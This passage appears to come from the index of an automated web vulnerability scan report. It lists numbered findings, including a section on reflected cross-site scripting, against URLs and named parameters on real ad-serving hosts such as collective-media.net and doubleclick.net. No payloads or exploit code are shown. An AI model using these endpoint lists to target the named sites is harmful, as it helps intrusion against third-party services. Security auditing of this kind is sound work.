3.87. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

3.88. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

3.89. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

3.90. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

3.91. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

3.92. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

3.93. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

3.94. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

3.95. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

3.96. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

3.97. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

3.98. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

3.99. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

3.100. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter]

3.101. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

3.102. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/ [name of an arbitrarily supplied request parameter]

3.103. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [REST URL parameter 3]

3.104. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [REST URL parameter 4]

3.105. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [name of an arbitrarily supplied request parameter]

3.106. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ [name of an arbitrarily supplied request parameter]

3.107. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ [ord parameter]

3.108. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 3]

3.109. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 4]

3.110. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 5]

3.111. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [a parameter]

3.112. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [dcc parameter]

3.113. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [dcp parameter]

3.114. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

3.115. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [vehicle parameter]

3.116. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [name of an arbitrarily supplied request parameter]

3.117. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [ord parameter]

3.118. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 3]

3.119. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 4]

3.120. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 5]

3.121. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [a parameter]

3.122. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [dcc parameter]

3.123. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [dcp parameter]

3.124. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

3.125. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [vehicle parameter]

3.126. http://ad.afy11.net/ad [c parameter]

3.127. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4]

3.128. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

3.129. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

3.130. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.131. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.132. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.133. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

3.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

3.136. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.137. http://media.fastclick.net/w/click.here [c parameter]

3.138. http://media.fastclick.net/w/click.here [cid parameter]

3.139. http://media.fastclick.net/w/click.here [i parameter]

3.140. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 2]

3.141. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 4]

3.142. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 5]

3.143. http://xads.zedo.com/ads2/c [a parameter]

3.144. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]

4. Cross-site scripting (reflected)

4.1. http://a.collective-media.net/ad/cm.quadbostonherald/ [REST URL parameter 1]

4.2. http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1]

4.3. http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1]

4.4. http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1]

4.5. http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1]

4.6. http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1]

4.7. http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1]

4.8. http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1]

4.9. http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1]

4.10. http://a.collective-media.net/ad/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1]

4.11. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 2]

4.12. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 3]

4.13. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]

4.14. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [sz parameter]

4.15. http://a.collective-media.net/adj/cm.quadbostonherald/ [REST URL parameter 2]

4.16. http://a.collective-media.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]

4.17. http://a.collective-media.net/adj/cm.quadbostonherald/ [sz parameter]

4.18. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]

4.19. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]

4.20. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]

4.21. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

4.22. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

4.23. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]

4.24. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]

4.25. http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 2]

4.26. http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 3]

4.27. http://a.collective-media.net/adj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]

4.28. http://a.collective-media.net/adj/q1.bosherald/be_ent [sz parameter]

4.29. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 2]

4.30. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 3]

4.31. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]

4.32. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [sz parameter]

4.33. http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 2]

4.34. http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 3]

4.35. http://a.collective-media.net/adj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]

4.36. http://a.collective-media.net/adj/q1.bosherald/ent [sz parameter]

4.37. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]

4.38. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]

4.39. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]

4.40. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]

4.41. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2]

4.42. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3]

4.43. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter]

4.44. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter]

4.45. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 1]

4.46. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 2]

4.47. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 3]

4.48. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]

4.49. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [sz parameter]

4.50. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]

4.51. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

4.52. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

4.53. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]

4.54. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]

4.55. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 1]

4.56. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 2]

4.57. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 3]

4.58. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]

4.59. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [sz parameter]

4.60. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 1]

4.61. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 2]

4.62. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 3]

4.63. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]

4.64. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [sz parameter]

4.65. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 1]

4.66. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 2]

4.67. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 3]

4.68. http://a.collective-media.net/cmadj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]

4.69. http://a.collective-media.net/cmadj/q1.bosherald/ent [sz parameter]

4.70. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]

4.71. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]

4.72. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]

4.73. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]

4.74. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]

4.75. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1]

4.76. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2]

4.77. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3]

4.78. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter]

4.79. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter]

4.80. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [c parameter]

4.81. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [c parameter]

4.82. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [forced_click parameter]

4.83. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [forced_click parameter]

4.84. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [m parameter]

4.85. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [m parameter]

4.86. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [mid parameter]

4.87. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [mid parameter]

4.88. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sid parameter]

4.89. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sid parameter]

4.90. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sz parameter]

4.91. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sz parameter]

4.92. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [tp parameter]

4.93. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [tp parameter]

